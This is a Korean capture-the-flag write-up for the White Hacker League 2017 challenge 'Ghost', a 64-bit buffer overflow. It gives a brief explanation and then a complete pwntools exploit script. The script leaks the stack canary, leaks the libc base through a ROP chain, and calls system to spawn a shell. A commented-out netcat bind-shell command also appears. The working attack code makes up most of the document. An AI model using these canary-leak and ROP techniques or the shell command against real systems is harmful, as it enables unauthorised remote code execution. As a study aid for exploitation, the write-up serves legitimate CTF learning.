[White Hacker League 2017] Ghost

Pwnable - Ghost (440)

그냥 64bit rop 문제다.

fork()를 사용하기 때문에 프로세스가 켜져있는 동안은 라이브러리 주소와 카나리가 바뀌지 않는다.

그리고 Relro가 걸려있어 got를 못덮기 때문에 카나리 릭하고 base 릭한후 시스템주소 구해서 쉘따면 된다.

from pwn import *
 
e = ELF('./ghost')
 
p_rdi = 0x4015b3
p_rsi_r15 = 0x4015b1
p_rdx = 0x40153d
offset = 0x20740
#cmd = 'nc -lvp 5555 -e /bin/sh'
cmd = '/bin/sh 0>&4 1>&4 2>&4;'
 
def set():
    s.sendlineafter('? ', 'y')
    for i in range(3):
        s.sendlineafter('choice) : ', '1')
        s.sendlineafter('choice) : ', '2')
    for i in range(2):
        s.sendlineafter('choice) : ', '6')
    s.sendlineafter('choice) : ', '3')
    s.sendlineafter('choice) : ', '4')
    s.sendlineafter('choice) : ', '5')
    s.sendlineafter('choice) : ', '6')
 
#canary leak
s = remote('localhost', 9999)
set()
s.sendafter('Chance : ', 'A'*200)
s.recvuntil('A'*200)
canary = u64(s.recv(8))
print 'canary : ' + hex(canary)
s.close()
 
#libc_start_main leak
s = remote('localhost', 9999)
set()
payload = ''
payload += 'A'*200
payload += p64(canary)
payload += 'A'*8
 
payload += p64(p_rdi)
payload += p64(4)
payload += p64(p_rsi_r15)
payload += p64(e.got['__libc_start_main']) #0x602F90
payload += 'AAAAAAAA'
payload += p64(p_rdx)
payload += p64(8)
payload += p64(e.plt['write'])
 
s.sendafter('Chance : ', payload)
s.recvuntil(p64(canary))
base = u64(s.recv(8)) - 0x20740
print 'libc_base : ' + hex(base)
s.close()
 
s = remote('localhost', 9999)
set()
payload = ''
payload += 'A'*200
payload += p64(canary)
payload += 'A'*8
 
payload += p64(p_rdi)
payload += p64(4)
payload += p64(p_rsi_r15)
payload += p64(e.bss())
payload += 'AAAAAAAA'
payload += p64(p_rdx)
payload += p64(len(cmd)+1)
payload += p64(e.plt['read'])
 
payload += p64(p_rdi)
payload += p64(e.bss())
payload += p64(base+0x45390)
 
s.sendafter('Chance : ', payload)
s.recv(1024)
s.sendline(cmd)
 
s.interactive()